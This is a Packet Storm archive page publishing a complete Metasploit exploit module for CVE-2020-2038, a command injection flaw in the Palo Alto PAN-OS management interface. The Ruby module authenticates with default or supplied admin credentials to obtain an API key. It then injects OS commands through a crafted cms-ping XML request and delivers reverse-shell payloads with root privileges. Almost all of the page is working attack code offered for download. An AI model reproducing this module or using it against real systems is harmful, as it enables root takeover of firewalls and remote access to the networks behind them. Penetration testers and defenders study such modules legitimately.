exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Palo Alto Networks Authenticated Remote Code Execution

Palo Alto Networks Authenticated Remote Code Execution
Posted Sep 16, 2022
Authored by UnD3sc0n0c1d0, Mikhail Klyuchnikov, jheysel-r7, Nikita Abramov | Site metasploit.com

This Metasploit module exploits an OS command injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts PAN-OS versions prior to 10.0.1, 9.1.4 and 9.0.10.

tags | exploit, arbitrary, root
advisories | CVE-2020-2038
SHA-256 | bd8da0b51bb49981c02de534b677f79ab91e97edd6c6f772d526bed01cfe7f69

Palo Alto Networks Authenticated Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

require 'ipaddr'

class InvalidRequest < StandardError
end

class InvalidResponse < StandardError
end

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Palo Alto Networks Authenticated Remote Code Execution',
'Description' => %q{
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated
administrators to execute arbitrary OS commands with root privileges.
This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10
},
'Author' => [
'Mikhail Klyuchnikov', # Vulnerability discovery
'Nikita Abramov', # Vulnerability discovery
'UnD3sc0n0c1d0', # Exploit
'jheysel-r7' # msf module
],
'References' => [
['CVE', '2020-2038'],
['URL', 'https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/'],
['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038'],
['URL', 'https://github.com/und3sc0n0c1d0/CVE-2020-2038'] # Exploit
],
'DisclosureDate' => '2020-09-09',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Privileged' => true,
'Targets' => [
[
'Linux ',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'CmdStagerFlavor' => %i[echo printf],
'Type' => :linux_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
[
'Unix In-Memory',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)

register_options(
[
OptString.new('USERNAME', [false, 'PAN-OS administrator username', 'admin']),
OptString.new('PASSWORD', [false, 'Password for username', 'admin'])
]
)
end

def check
print_status('Authenticating...')
begin
@api_key = api_key
rescue InvalidRequest, InvalidResponse => e
return Exploit::CheckCode::Safe("Error retrieving API key: #{e.class}, #{e}")
end
res = send_request_cgi({
'method' => 'GET',
'keep_cookies' => 'true',
'uri' => normalize_uri(target_uri.path, 'api/'),
'vars_get' => {
'type' => 'version',
'key' => @api_key
}
})

return CheckCode::Unknown('The API did not respond to the request for the version of PAN_OS') unless res&.body

version = Rex::Version.new(res.get_xml_document.xpath('/response/result/sw-version').text)

if version >= Rex::Version.new('9.0.0') && version < Rex::Version.new('9.0.10') ||
version >= Rex::Version.new('9.1.0') && version < Rex::Version.new('9.1.4') ||
version >= Rex::Version.new('10.0.0') && version < Rex::Version.new('10.0.1')
return Exploit::CheckCode::Appears
end

Exploit::CheckCode::Safe
end

def api_key
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'api/'),
'vars_get' => {
'type' => 'keygen',
'user' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
})

if res.nil?
raise InvalidRequest, 'Unreachable'
end

if res.code == 401
raise InvalidRequest, 'Server returned HTTP status 401 - Authentication failed'
end

if res.code == 403
raise InvalidRequest, 'Server returned HTTP status 403 - Authentication failed with "Invalid Credentials"'
end

if res.body.blank?
raise InvalidResponse, 'Empty reply from server'
end

key = res.get_xml_document.xpath('/response/result/key')&.text

if key.nil?
raise InvalidResponse, 'Empty reply from server'
end

print_good('Successfully obtained api key')

key
end

def execute_command(cmd, _opts = {})
payload = "<cms-ping><host>#{IPAddr.new(rand(2**32), Socket::AF_INET)}</host><count>#{rand(1..50)}</count><pattern>111<![CDATA[||#{cmd}||]]></pattern></cms-ping>"
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'api/'),
'vars_get' => {
'cmd' => payload,
'type' => 'op',
'key' => @api_key
}
})
end

def exploit
begin
@api_key ||= api_key
rescue InvalidRequest, InvalidResponse => e
fail_with(Failure::UnexpectedReply, "Error retrieving API key: #{e}")
end
print_status('Exploiting...')
case target['Type']
when :unix_memory
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end

end
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close